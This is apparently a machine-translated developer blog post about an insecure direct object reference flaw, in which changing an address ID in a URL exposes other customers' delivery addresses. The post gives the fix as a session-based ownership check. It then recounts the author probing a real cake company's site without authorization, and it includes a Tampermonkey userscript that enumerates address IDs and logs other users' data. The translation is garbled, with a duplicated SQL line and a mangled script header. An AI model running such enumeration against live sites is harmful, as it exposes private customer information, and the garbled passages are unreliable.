Last year, the company took a large sheet of nanshan, because the project is not completely similar reference must depend on oneself fumble, then is to do a version of the feeling not to adjust, and modify, then new features to be developed, not busy at that time a person come over, very headache, shanzhai for more convenient work just camped out at clients, development and discuss solutions, I came home at midnight every day. However, due to the development of new functions, the old layout is also being adjusted, and then there are some bugs to be fixed. The workload of one person is too much, while the client requires fast progress, so many details are ignored, but also hidden security risks. The work lasted about three months, and finally the development was finished. I was very happy in my heart, and finally a project was finished. But also at this time, the customer to find a professional tester, specialized test system vulnerabilities, before the root of the curse will appear, find 7, 8 vulnerabilities, including online payment, customer information security, etc.. SQL > select top 1 * from addr where id= ‘id’; SQL > select top 1 * from addr where id= ‘id’; However, if a user modifies an ID casually in a Get request under a Web site, the information of other customers may be obtained, and the information of other customers may be seriously disclosed. If the web address get is /user/deliveryAddress/55 and the user enters /user/deliveryAddress/56, the correct way is to obtain the user ID from the current login session and compare the user ID with the address ID. So you don’t go wrong. Select top 1 * from addr where id= userid and userid= userid In fact, a few days ago, it was revealed that a cake was not made fresh on that day, and the internal management was in a mess. In fact, I also bought a cake at their home before, so I was curious and went to their official website to have a look. I accidentally found that when the user modified the address information, the user also obtained the information in the same way as I did before /user/deliveryAddress/ ID. As an IT, I made this mistake before. Out of curiosity, I randomly modified an address ID. As expected, the address information was changed and I saw the information of other users. Later, to verify, I wrote a loop on tamperMonkey

// ==UserScript== // @name XFXB // @namespace // @version 0.1 // @description try to take over the world! / / @ the author You / / @ match * / / / / @ @ the require grant none // ==/UserScript== (function() { ‘use strict’; for(var i=1000; i<1005; i++){ $.get(“/user/deliveryAddress/”+i, function(result){ console.log(result); }); } // Your code here… }) ();

The following information appears

It’s easy to get access to other users’ addresses, and it looks like everyone else is making the same mistake.

@it of a cake website, your bug should be fixed to record the potholes you step on. Hope others will step on the same potholes less, and can find solutions in CNBLOGS